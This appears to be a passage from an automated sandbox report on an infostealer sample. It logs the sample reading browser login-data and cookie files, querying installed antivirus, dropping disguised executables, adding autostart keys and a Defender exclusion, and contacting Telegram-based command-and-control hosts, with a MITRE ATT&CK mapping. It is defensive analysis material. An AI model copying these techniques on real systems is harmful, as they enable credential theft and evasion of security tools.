                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
                              Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\GIGI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\GILI____.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\GOUDOS.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\HARNGTON.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\HATTEN.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\INFROMAN.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\LFAXD.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\LFAXI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\LFAXDI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\ROCKB.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\ROCKBI.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\ROCC____.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\SNAP____.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\TCCEB.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\OFFSYM.TTF | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf | VolumeInformation
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Queries volume information: C:\Windows\System32\r6Lr6XbTWt.exe | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ | VolumeInformation
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Queries volume information: C:\Windows\System32\r6Lr6XbTWt.exe | VolumeInformation
Source: C:\Recovery\0eDO5Zbs.exe | Queries volume information: C:\Recovery\0eDO5Zbs.exe | VolumeInformation
Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Queries volume information: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | VolumeInformation
Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Queries volume information: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | VolumeInformation
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Queries volume information: C:\Users\user\Desktop\VQdUvAQ4xO.exe | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | VolumeInformation
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Queries volume information: C:\Windows\System32\r6Lr6XbTWt.exe | VolumeInformation
Source: C:\Recovery\0eDO5Zbs.exe | Queries volume information: C:\Recovery\0eDO5Zbs.exe | VolumeInformation
Source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | Queries volume information: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe | VolumeInformation
Source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | Queries volume information: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe | VolumeInformation
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Queries volume information: C:\Users\user\Desktop\VQdUvAQ4xO.exe | VolumeInformation
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | Queries volume information: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | VolumeInformation
Source: C:\Windows\System32\r6Lr6XbTWt.exe | Queries volume information: C:\Windows\System32\r6Lr6XbTWt.exe | VolumeInformation
Source: C:\Users\user\Desktop\VQdUvAQ4xO.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.1891369634.0000000012C1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: VQdUvAQ4xO.exe PID: 1216, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: r6Lr6XbTWt.exe PID: 7548, type: MEMORYSTR
Source: Yara match | File source: VQdUvAQ4xO.exe, type: SAMPLE
Source: Yara match | File source: 0.0.VQdUvAQ4xO.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1772742377.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Windows\System32\r6Lr6XbTWt.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\0eDO5Zbs.exe, type: DROPPED
Source: Yara match | File source: Process Memory Space: csc.exe PID: 1720, type: MEMORYSTR
Source: Yara match | File source: VQdUvAQ4xO.exe, type: SAMPLE
Source: Yara match | File source: 0.0.VQdUvAQ4xO.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Windows\System32\r6Lr6XbTWt.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\0eDO5Zbs.exe, type: DROPPED
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.1891369634.0000000012C1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: VQdUvAQ4xO.exe PID: 1216, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: r6Lr6XbTWt.exe PID: 7548, type: MEMORYSTR
Source: Yara match | File source: VQdUvAQ4xO.exe, type: SAMPLE
Source: Yara match | File source: 0.0.VQdUvAQ4xO.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1772742377.00000000005D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Windows\System32\r6Lr6XbTWt.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\0eDO5Zbs.exe, type: DROPPED
Source: Yara match | File source: Process Memory Space: csc.exe PID: 1720, type: MEMORYSTR
Source: Yara match | File source: VQdUvAQ4xO.exe, type: SAMPLE
Source: Yara match | File source: 0.0.VQdUvAQ4xO.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Windows\System32\r6Lr6XbTWt.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Windows Portable Devices\mENvqiIeFx.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Microsoft\tNOtXAG6xwxcUNu9tjBa.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files\Windows Sidebar\JOajDppbSkfqSPK1G9zAbH.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\0eDO5Zbs.exe, type: DROPPED
MITRE ATT&CK Matrix (techniques listed per tactic column; a leading number is the count badge attached to that technique in the matrix)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: 141 Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: 1 Scripting; 1 DLL Side-Loading; 31 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 31 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading; 1 File Deletion; 133 Masquerading; 261 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: 2 File and Directory Discovery; 144 System Information Discovery; 341 Security Software Discovery; 1 Process Discovery; 261 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 Remote System Discovery; 11 System Network Configuration Discovery; Network Sniffing
Lateral Movement: 1 Taint Shared Content; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: 11 Archive Collected Data; 1 Data from Local System; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

Legend:

• Process
• Signature
• Created File
• DNS/IP Info
• Is Dropped
• Is Windows Process
• Number of created Registry Values
• Number of created Files
• Visual Basic
• Delphi
• Java
• .Net C# or VB.NET
• C, C++ or other language
• Is malicious
• Internet
Behavior Graph ID: 1596749 | Sample: VQdUvAQ4xO.exe | Startdate: 22/01/2025 | Architecture: WINDOWS | Score: 100

Start node
  DNS/IP: api.telegram.org; 525833cm.nyashnyash.ru; ipinfo.io
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Antivirus detection for dropped file; 17 other signatures
  api.telegram.org: Uses the Telegram API (likely for C&C communication)
  Started: VQdUvAQ4xO.exe (26 35); tNOtXAG6xwxcUNu9tjBa.exe; 0eDO5Zbs.exe; 13 other processes

VQdUvAQ4xO.exe
  DNS/IP: api.telegram.org 149.154.167.220, 443, 49733, 49751 TELEGRAMRU United Kingdom; ipinfo.io 34.117.59.81, 443, 49731, 49732 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States
  Dropped: C:\Windows\System32\r6Lr6XbTWt.exe, PE32; C:\Users\user\Desktop\vSXJQEeZ.log, PE32; C:\Users\user\Desktop\lkEtgbYs.log, PE32; 16 other malicious files
  Signatures: Creates an undocumented autostart registry key; Creates multiple autostart registry keys; Creates an autostart registry key pointing to binary in C:\Windows; Adds a directory exclusion to Windows Defender
  Started: cmd.exe; csc.exe (4); powershell.exe; 5 other processes

tNOtXAG6xwxcUNu9tjBa.exe (started by start node)
